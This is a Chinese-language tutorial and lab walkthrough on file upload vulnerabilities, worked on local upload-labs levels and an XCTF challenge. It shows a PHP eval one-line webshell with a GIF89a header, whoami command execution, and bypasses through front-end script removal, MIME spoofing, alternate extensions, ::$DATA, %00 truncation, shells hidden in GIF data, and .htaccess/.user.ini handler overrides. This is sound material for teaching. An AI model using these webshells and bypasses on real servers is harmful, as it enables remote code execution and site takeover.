赞
踩
目录
文件上传漏洞是 Web 安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell 等到服务器执行,并最终获得网站控制权限的高危漏洞。
大部分的网站和应用系统都有上传功能,而程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。这时攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(jsp、asp、php、aspx文件后缀)到服务器上,从而访问这些恶意脚本中包含的恶意代码,进行动态解析最终达到执行恶意代码的效果,进一步影响服务器安全。
如果 Web 应用程序存在上传漏洞 , 攻击者上传的文件是 Web 脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。如果上传的文件是 Flash 的策略文件 crossdomain.xml,黑客用以控制 Flash 在该域下的行为。如果上传的文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行。如果上传的文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。甚至攻击者可以直接上传一个 webshell 到服务器上 完全控制系统或致使系统瘫痪。
webshell 就是以 asp、aspx、php、jsp 或者 cgi 等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
Upload-Labs:GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场
本地新建一个名为 WebShell.php 的文件,内容为 php 一句话:
- GIF89a
- <?php @eval($_POST["cmd"]);?>
这里解释一下为什么要加 GIF89a,因为有些 Waf 会检测文件内容,而 GIF89a 就是图片内容的头。
访问本地漏洞环境:http://127.0.0.1/upload/Pass-00/index.php
点击 "浏览" 将 PHP 一句话上传到目标服务器。
上传成功后可以看到下方有一个 破损图片的框框,右键破损图片选择 "新建标签页打开图像",之后会跳转到:http://127.0.0.1/upload/upload/WebShell.php
POST 传输如下字符可执行命令:whoami
cmd=system("whoami");
如何判断前端拦截
上传一个非法文件利用 Burp 进行抓包,如果没有抓到包就说明是前端拦截
查看页面源代码,如果存在 javascript 代码,并且该代码是过滤、限制的就说明是前端拦截
访问本地环境:http://127.0.0.1/upload/Pass-01/index.php
上传 WebShell 到目标服务器上。
可以看到这里提示我们只允许上传 jpg、png、gif类型的文件。
前面写道:如果存在 javascript 代码,并且该代码是过滤、限制的就说明是前端拦截。
F12 审查元素查看是否存在 javascript 代码。
可以看到这里存在 javascript 代码,并且该代码就是前端验证的代码,找到调用 checkFile() 的地方,将其去掉即可绕过。
去掉 checkFile() 后,重新上传 WebShell。
右键破损图片选择 "新建标签页打开图像" 访问我们的 WebShell 查看是否成功上传。
介绍了第一种绕过前端方式,接着介绍第二种,这里需要借用到 Burp 抓包工具。
首先将 WebShell.php 修改为 WebShell.jpg,这样就可以欺骗前端,从而能让 Burp 抓取到数据包。
将 WebShell.jpg 上传,在上传中要开启 Burp 抓包功能再点击上传。
再数据包中将 jpg 后缀名修改为 php 然后放包即可绕过前端验证。
右键破损图片选择 "新建标签页打开图像" 访问我们的 WebShell 查看是否成功上传。
这里就介绍完两种方式绕过前端了,哪种简单用哪种,看个人喜好。
访问漏洞环境:http://127.0.0.1/upload/Pass-02/index.php
点击 "显示源码",分析源码。
这里我们看红色框框的内容即可。
这里的 if 判断为,如果你上传的 type 类型为:image/jpeg、image/png······就可以让你上传文件,如果不是则返回 "文件类型不正确,请重新上传!"。
首先将 Burp 抓包功能开启,然后将 WebShell 进行上传。
将 "application/octet-stream" 修改为 "image/jpeg" 类型,放包即可绕过。
右键破损图片选择 "新建标签页打开图像" 访问我们的 WebShell 查看是否成功上传。
访问漏洞环境:http://127.0.0.1/upload/Pass-03/index.php
点击右上角的 "查看提示"。
本关卡禁止上传 asp、aspx、php、jsp 文件。
将我们的 WebShell.php 修改为 WebShell.phtml、php1 ···· php9,这里我修改为 phtml。
将 WebShell.phtml 上传。
右键破损图片选择 "新建标签页打开图像" 访问我们的 WebShell 查看是否成功上传。
注意事项:phtml 并不是所有服务器都能解析的,如果需要解析需要到 Apache 中的 httpd.conf 配置文件将如下图的注释去掉。
如果目标服务器为 Windows 我们可以利用 Windows 的特性进行绕过。
回到上传页面,点击 "显示源码"。
分析 10 行与 5 行的代码。
第十行过滤了 "::$DATA"。但值得注意的是仅仅过滤了一次,所以我们可以利用双写进行绕过。
在 Window 的时候如果 "文件名::$DATA" 会把 ::$DATA 之后的数据当成文件流处理,不会检测后缀名,且保持 ::$DATA 之前的文件名,他的目的就是不检查后缀名。
在后缀添加 ::$DAT::$DATAA
右键破损图片选择 "新建标签页打开图像" 访问我们的 WebShell 查看是否成功上传。
这里将 ::$DATA去掉即可。
当然黑名单绕过不止这些这里简单列一下:
在开始前首先讲讲 %00 截断的原理和利用条件。
(1)利用原理
00 截断是操作系统层的漏洞,由于操作系统是 C 语言或汇编语言编写的,这两种语言在定义字符串时,都是以 \0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到 \0 字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0 字符的方式,达到字符串截断的目的。00 截断通常用来绕过 web 软 waf 的白名单限制。
(2)利用条件
访问漏洞环境:http://127.0.0.1/upload/Pass-12/index.php
上传 WebShell.jpg 文件的同时开启 Burp 抓包功能。
快捷键 Ctrl + R 将数据包发送到 Repeater 重放模块。
在数据包中有个变量值 save_path 该值为 GET 方式,我们在后面添加如下数据,然后点击 Send 发送数据。
可以看到成功绕过白名单限制上传 php 文件。
访问 upload/webshell.php 文件查看是否上传成功。
该方法为 GET 方式传输,而 POST 传输是一定有区别的,下面演示 POST 传输方式。
访问漏洞环境:http://127.0.0.1/upload/Pass-13/index.php
上传 WebShell.jpg 文件的同时开启 Burp 抓包功能。
快捷键 Ctrl + R 将数据包发送到 Repeater 重放模块。
可以在数据包中看到 save_path 这个值是是下方的,说明这个值是 POST 方式提交。
跟一样的 GET 上传方式都是差不多一样的,首先在如下图红色框框添加上如下数据:
接着选中 %00,快捷键 Ctrl+Shift+U 将 %00 进行解码,最后 %00 会变成一个空格。
这里解释一下为什么要将 %00 进行解码,因为 POST 方式不会将我们的 %00 进行二次 URL 解码,而 GET 方式会,所以我们需要对 %00 进行 URL 解码。
这时就可以点击 Send 发送数据包了。
访问 upload/WebShell.php 文件,查看是否上传成功。
(1)什么是二次渲染
二次渲染:就是根据用户上传的图片,新生成一个图片,将原始图片删除,将新图片添加到数据库中。比如一些网站根据用户上传的头像生成大中小不同尺寸的图像。
在本地准备两个文件,分别为:tu.gif、shell.php。tu 为正常图片,shell 为一句话木马文件。
打开 cmd 将这两个文件合成一个新的图片文件。
copy tu.gif /b + shell.php /a tushell.gif
将 tushell.gif 拉取到 Editor 中进行查看,如下图可以看出已经将一句话插入 gif 图片中。
访问漏洞环境:http://127.0.0.1/upload/Pass-17/index.php
上传 tushell.gif 文件到目标服务器。
鼠标右键将图片上传的图片下载到本地来。
将 1281378780.gif 放入 Editor 中进行查看,从图中可以看到我们的一句话已经被二次渲染了不见了。
而我们的目的是需要经过二次渲染并且我们的一句话不会被渲染掉,将 tushell.gif 和 1281378780.gif 放入 Editor 进行比较。
经过比较,在 2c 00 00 00 00 ···· B6 4C 49 72处两个图片是一直的,也就是说这个地方是不会被二次渲染,所以我们可以在此处插入一句话木马,向 tushell.gif 插入一句话,注意是插入不要将里面的数据给替换了原来的数据要一字不缺的保留。
重新将 tushell 文件上传到服务器中。
右键图片,将图片下载到本地。
将图片放入 Editor 中进行查看,可以看到并没有被过滤。
访问文件包含漏洞环境:http://127.0.0.1/upload/include.php
用文件包含漏洞去包含我们刚刚上传的图片,并执行 phpinfo() 代码。
(1).htaccess 文件
.htaccess 是一个纯文本文件,里面存放着 Apache 服务器配置相关的一些指令,它类似于 Apache 的站点配置文件,只支持本目录其可以访问控制, URL 规则等等,这里拿来进行绕过上传的防御规则。
htaccess 文件是 Apache 服务器中的一个配置文件,它负责相关目录下的网页配置。通过 htaccess 文件,可以帮我们实现:网页 301 重定向、自定义 404 错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
文件内容:
- <FilesMatch "m">
- SetHandler application/x-httpd-php
- </FilesMatch>
htaccess 文件说明/上传流程
这里的 htaccess 文件的意思就是将 m 开头的文件按 php 来进行解析
先上传 m 开头的 jpg 文件,ma.jpg
再上传 htaccess 文件
再去访问 ma.jpg 这时就可以命令执行了
(2).user.ini 文件介绍
.user.ini。它比 .htaccess 用的更广,不管是 nginx/apache/IIS ,只要是以 fastcgi 运行的 php 都可以用这个方法。我的 nginx 服务器全部是 fpm/fastcgi ,我的 IIS php5.3 以上的全部用的 fastcgi/cgi ,我win下的 apache 上也用的 fcgi ,可谓很广,不像 .htaccess 有局限性。
这个文件是 php.ini 的补充文件,当网页访问的时候就会自动查看当前目录下是否有 .user.ini ,然后将其补充进 php.ini ,并作为 cgi 的启动项。其中很多功能设置了只能 php.ini 配置,但是还是有一些危险的功能可以被我们控制,比如 auto_prepend_file。
文件内容:
- GIF89a
- auto_prepend_file=cmd.jpg
这里的文件内容意思是包含 cmd.jpg,将 cmd.jpg 解析。
首先上传 cmd.jpg 文件,内容为一句话木马
再将我们的 .user.ini 文件上传
最后访问 index.php 即可 GetShell,例:上传路径为 upload 那么访问 upload/inde.php,如果上传在当前目录直接访问 index.php
注:顺序一定要先上传 "木马",在上传 ".user.ini" 配置文件
(3) .htaccess上传
访问漏洞环境:http://127.0.0.1/upload/Pass-04/index.php
上传 WebShell.jpg 文件到服务器。
接着上传 .htaccess 文件,内容如下:
- <FilesMatch "W">
- SetHandler application/x-httpd-php
- </FilesMatch>
访问 php 一句话马子: http://127.0.0.1/upload/upload/WebShell.jpg
(4).user.ini上传
访问漏洞环境:XCTF 中的 easyupload
上传 ma.png 到目标服务器中,这里有过滤得改下木马内容才能上传。
- GIF89a
- <?=@eval($_POST['cmd']);
上传 .user.ini 文件到目标服务器,内容如下:
- GIF89a
- auto_prepend_file=ma.png
这里得用 Burp 抓包修改 Type 为 image/png 绕过。
放包即可上传。
访问 uploads 路径,注意是访问 uploads 文件夹。
尝试执行 phpinfo() 代码。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。